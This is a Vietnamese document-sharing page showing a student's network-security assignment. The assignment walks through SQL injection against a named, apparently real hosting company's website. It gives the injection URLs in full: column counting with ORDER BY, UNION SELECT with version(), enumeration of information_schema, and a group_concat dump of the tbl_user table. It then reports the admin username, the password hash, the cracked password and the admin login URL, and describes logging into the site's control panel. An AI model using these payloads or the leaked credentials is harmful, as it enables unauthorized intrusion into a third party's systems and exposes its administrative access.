1. Trang chủ
  2. » Giáo án - Bài giảng

Bài tập an toàn thông tin mạng

13 414 0
Tài liệu đã được kiểm tra trùng lặp

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Định dạng
Số trang 13
Dung lượng 4,8 MB

Nội dung

Trang 1

HUỲNH QUỐC NHA LỚP 12TLT.CNTT

MÃ SINH VIÊN: 102120324

WEB HACK : http://www.hostingak.net/

Trang gốc chọn để hack : http://www.hostingak.net/?frame=product_detail&id=294

Hình 1 : Trang web gốc

Trang 2

Ta kiểm tra , bằng cách thêm dấu nháy “ ‘ ” sau URL : … Id=294 : http://www.hostingak.net/?frame=product_detail&id=294%27

Hình 2 : Kiểm tra trang web lỗi

Trang 3

Bước 2:Đếm số cột dùng order by đế xác định cột Ban đầu mình thử đoán số column là 1

Ta nhập vào link sau : http://www.hostingak.net/?frame=product_detail&id=294%20order%20by%201

Và kết quả là :

Hình 3 : kết quả bình thường khi thử với “ order by 1 ”

Trang 4

Ta tiếp tục thử với “ order bay 15 ”

Kết quả là :

http://www.hostingak.net/?frame=product_detail&id=294%20order%20by%2015 Hình 4 : kết quả vẩn bình thường khi thử với “ order by 15 ”

Trang 5

Ta tiếp tục thử với “ order by 16 ”

Kết quả là :

http://www.hostingak.net/?frame=product_detail&id=294%20order%20by%2016 Hình 5 : Kết quả lỗi khi thử với “ order by 16 ”

Vậy ta kết luận có 15 cột

Trang 6

Bước 3: Ta sử dụng Union liên kết 2 câu truy vấn, tìm table cần khai thác thông qua information_schema.Tables

Đầu tiên thực hiện Union

Ta có kết quả :

Hinh 6: Kết quả khi ta sử dụng Union để tìm ra cột lỗi

Như vậy a đã biết được cột lỗi là cột thứ : 6

Trang 7

Tiếp đến ta sử dụng hàm version() để show ra version version() đặt ở 1 trong vị trí các column bị lỗi.ở đây mình đặt ở column số 6

và ta có kết quả

Trang 8

%201,%202,3,4,5,%20version(),%207,%208,%209,%2010,%2011,%2012,13,14,15 Hình 7 : Kết quả kiểm tra phiên bản

Vậy ta có kết quả phiên bản là 5.1.73

Bây giờ ta tìm tất cả các Table của database

Kết quả là :

Hình 8: Kết quả truy vấn các Table của database

Tất cả các table của Database :

CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,ENGINES,EVENTS,FILES,GLOBAL_STATUS,GLOBAL_VARIABLES,KEY_COLUMN_USAGE,PARTI

Trang 9

Bước 4 trên information_chema.Columns để tìm các COLUMN thuộc table tương ứng bên trên, ở đây ta chỉ chú ý đến tbl_user , để ta tìm các trường trong bảng này

Kết quả :

Trang 10

Hình 9: Kết quả tìm các trường trong bảng tbl_user

Vậy ta có 3 trường trong bảng này là id,uid,pwd

Bước 5: Vậy là ta có talbe và column cần thiết rôi ta chỉ việc khai thác thông tin ở đây , đó là uid và pwd

Lấy thông tin uid và pwd bằng câu truy vấn sau :

Kết quả :

Trang 11

%201,2,3,4,5,group_concat(uid,0x2f,pwd),7,8,9,10,11,12,13,14,15%20from%20tbl_user%20 %20-Hình 10: Kết quả truy vấn uid và pwd

Vậy ta có kết quả là : admin/e3976d13683589d21ed11314e7254778

Nghĩa là uid : admin , pwd : e3976d13683589d21ed11314e7254778 , Ta mã hóa ra : 015243

Vậy ta đã có thông tin đăng nhập quản trị, ta chỉ việc tìm đến và đăng nhậphttp://www.hostingak.net/admin/login.php

Trang 12

Hình 11 : Trang đăng nhập

Đăng nhập với Username : admin Password : 015243

Nhấn button Đăng Nhập

Và đây là kết quả:

Trang 13

Hình 12 : Trang Quản trị website

Ngày đăng: 24/03/2015, 23:24

TỪ KHÓA LIÊN QUAN

w